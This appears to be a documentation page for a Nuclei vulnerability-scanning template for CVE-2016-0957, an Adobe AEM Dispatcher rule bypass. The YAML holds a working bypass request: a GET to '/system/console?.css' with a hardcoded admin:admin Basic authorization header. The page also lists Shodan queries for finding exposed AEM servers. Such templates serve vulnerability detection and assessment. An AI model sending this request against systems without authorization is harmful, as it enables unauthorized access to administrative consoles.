Adobe AEM Dispatcher <4.15 - Rules Bypass
ID: CVE-2016-0957
Severity: high
Author: geeknik
Tags: cve2016,cve,adobe,aem
Description
Section titled “Description”Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
YAML Source
Section titled “YAML Source”id: CVE-2016-0957
info: name: Adobe AEM Dispatcher <4.15 - Rules Bypass author: geeknik severity: high description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors. impact: | The vulnerability allows attackers to bypass security rules and potentially gain unauthorized access to sensitive information or perform malicious actions. remediation: | Upgrade to Adobe AEM Dispatcher version 4.15 or higher to fix the vulnerability. reference: - https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html - https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html - https://nvd.nist.gov/vuln/detail/CVE-2016-0957 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2016-0957 epss-score: 0.03344 epss-percentile: 0.91361 cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: adobe product: dispatcher shodan-query: - http.component:"Adobe Experience Manager" - http.component:"adobe experience manager" tags: cve2016,cve,adobe,aem
http: - method: GET path: - "{{BaseURL}}/system/console?.css"
headers: Authorization: "Basic YWRtaW46YWRtaW4K"
matchers-condition: and matchers: - type: word words: - "Adobe" - "java.lang" - "(Runtime)" condition: and
- type: status status: - 200# digest: 4b0a0048304602210083619127632535c2af9e5c6b8f8fff2f3ffd71efc19a6966e0f119a33658e6bf022100c1ff00cda5fc3b17096a3d8f528b73fc70d059ed77c49cd7cc7669de9eaf32c9:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2016/CVE-2016-0957.yaml"